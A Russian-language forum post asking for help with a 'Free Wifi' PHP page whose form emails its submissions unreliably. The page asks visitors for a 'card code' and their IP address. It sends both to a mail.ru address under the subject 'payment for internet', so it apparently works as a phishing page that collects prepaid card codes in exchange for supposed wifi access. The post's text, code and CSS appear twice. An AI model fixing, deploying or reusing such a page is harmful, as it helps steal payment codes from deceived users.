03-30-2014, 01:49 PM
Вообщем вот такая проблема у моего знакомого сам не смог разобраться, обратная связь не пашет нормально, она через минут 5 присылает письма толи вообще забывает их присылать вообщем теряет.
кто поможет полностью настроить? Чтобы норм работало, я не думаю что там что то такое сложное. Одно время работало нормально потом начало чудить.
вот index.php
<?php
if($_REQUEST['act']=='send'){
mail('freewifi76@mail.ru','оплата интернета',
"Кто-то оплатил интернет".
"код карточки: ".$_REQUEST['code']."♔пробел♔".
"ip-aдрес: ".$_REQUEST['ip']."",$headers);
Header("Location: ok.php");
exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Free Wifi</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="css/ip_form.css" type="text/css"/>
<script type="text/javascript">
</script>
</head>
<body style="background:url(1.jpg) no-repeat center">
<div>Free wifi</div>
<div>
<form action='?act=send' method='post'>
<input type='text' name='code' placeholder='Код с карточки'>
<input type='text' name='ip' placeholder='Ваш ip адрес'>
<input type='submit' value='Отправить'>
</form>
</div>
</body>
</html>
css хотя думаю что он тут ненужен
* {
margin:0;
padding:0;
}
div{
text-align:center;
font-style:italic;
}
div:first-child{
color:#fff;
font-size:36px;
margin:100px;
}
input[type="text"]{
background-color:#444;
color:#fff;
font-size:18px;
padding:8px;
border-radius:8px;
border:2px solid #fff;
}
input[type="text"]:focus{
outline: none;
border:2px solid #08f;
box-shadow:0 0 15px rgba(0,128,255,0.8);
}
input[type="submit"]{
font-size:18px;
background-color: #f44;
background-image: linear-gradient(top, #8c9cbf 0%, #546a9e 50%, #36518f 50%, #3d5691 100%);
border: 1px solid #f88;
border-bottom: 1px solid #c00;
border-radius: 6px;
box-shadow: inset 0 1px 0 0 #f88;
color: #fff;
padding: 8px;
text-decoration: none;
text-align: center;
width: 150px;
}
input[type="submit"]:hover {
background-color: #f22;
background-image: linear-gradient(top, #7f8dad 0%, #4a5e8c 50%, #2f477d 50%, #364c80 100%);
cursor: pointer;
}
input[type="submit"]:active {
box-shadow: inset 0 0 20px 0 #ff0, 0 1px 0 white; }
}
кто поможет полностью настроить? Чтобы норм работало, я не думаю что там что то такое сложное. Одно время работало нормально потом начало чудить.
вот index.php
<?php
if($_REQUEST['act']=='send'){
mail('freewifi76@mail.ru','оплата интернета',
"Кто-то оплатил интернет".
"код карточки: ".$_REQUEST['code']."♔пробел♔".
"ip-aдрес: ".$_REQUEST['ip']."",$headers);
Header("Location: ok.php");
exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Free Wifi</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="css/ip_form.css" type="text/css"/>
<script type="text/javascript">
</script>
</head>
<body style="background:url(1.jpg) no-repeat center">
<div>Free wifi</div>
<div>
<form action='?act=send' method='post'>
<input type='text' name='code' placeholder='Код с карточки'>
<input type='text' name='ip' placeholder='Ваш ip адрес'>
<input type='submit' value='Отправить'>
</form>
</div>
</body>
</html>
css хотя думаю что он тут ненужен
* {
margin:0;
padding:0;
}
div{
text-align:center;
font-style:italic;
}
div:first-child{
color:#fff;
font-size:36px;
margin:100px;
}
input[type="text"]{
background-color:#444;
color:#fff;
font-size:18px;
padding:8px;
border-radius:8px;
border:2px solid #fff;
}
input[type="text"]:focus{
outline: none;
border:2px solid #08f;
box-shadow:0 0 15px rgba(0,128,255,0.8);
}
input[type="submit"]{
font-size:18px;
background-color: #f44;
background-image: linear-gradient(top, #8c9cbf 0%, #546a9e 50%, #36518f 50%, #3d5691 100%);
border: 1px solid #f88;
border-bottom: 1px solid #c00;
border-radius: 6px;
box-shadow: inset 0 1px 0 0 #f88;
color: #fff;
padding: 8px;
text-decoration: none;
text-align: center;
width: 150px;
}
input[type="submit"]:hover {
background-color: #f22;
background-image: linear-gradient(top, #7f8dad 0%, #4a5e8c 50%, #2f477d 50%, #364c80 100%);
cursor: pointer;
}
input[type="submit"]:active {
box-shadow: inset 0 0 20px 0 #ff0, 0 1px 0 white; }
}